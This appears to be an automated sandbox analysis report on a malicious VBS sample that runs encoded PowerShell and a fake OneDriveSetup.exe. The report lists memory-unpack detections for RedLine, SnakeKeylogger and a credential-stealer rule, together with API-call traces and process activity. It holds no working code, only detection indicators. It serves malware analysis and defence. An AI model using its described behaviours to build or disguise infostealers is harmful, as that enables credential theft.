                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851CF306_2_0851CF30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851D20A6_2_0851D20A
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_085174E06_2_085174E0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851C4E06_2_0851C4E0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851D4EA6_2_0851D4EA
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851A5986_2_0851A598
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851D7B86_2_0851D7B8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851EED06_2_0851EED0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_085143116_2_08514311
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851C6A86_2_0851C6A8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4150486_2_0C415048
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C419C486_2_0C419C48
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4195786_2_0C419578
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41D9D86_2_0C41D9D8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4125806_2_0C412580
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41DE306_2_0C41DE30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C411E986_2_0C411E98
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C410B306_2_0C410B30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4117B06_2_0C4117B0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4100406_2_0C410040
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41F8406_2_0C41F840
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4100066_2_0C410006
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41F8316_2_0C41F831
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4150386_2_0C415038
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41CCC06_2_0C41CCC0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41CCD06_2_0C41CCD0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41FC986_2_0C41FC98
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41D5706_2_0C41D570
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4125726_2_0C412572
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41D1196_2_0C41D119
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41D1286_2_0C41D128
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41D9C86_2_0C41D9C8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41D5806_2_0C41D580
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41E2796_2_0C41E279
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41DE1F6_2_0C41DE1F
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41E6D06_2_0C41E6D0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41E6E06_2_0C41E6E0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41E2886_2_0C41E288
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C411E8A6_2_0C411E8A
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C4193586_2_0C419358
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C410B206_2_0C410B20
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41EB296_2_0C41EB29
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41EB386_2_0C41EB38
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C418BC06_2_0C418BC0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41F3D76_2_0C41F3D7
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41F3E86_2_0C41F3E8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41EF806_2_0C41EF80
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41EF906_2_0C41EF90
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C41179F6_2_0C41179F
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C418BB06_2_0C418BB0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: Doc261124.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2466
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2466Jump to behavior
                  Source: 6.2.OneDriveSetup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.OneDriveSetup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/6@7/7
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvunym5x.lfk.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
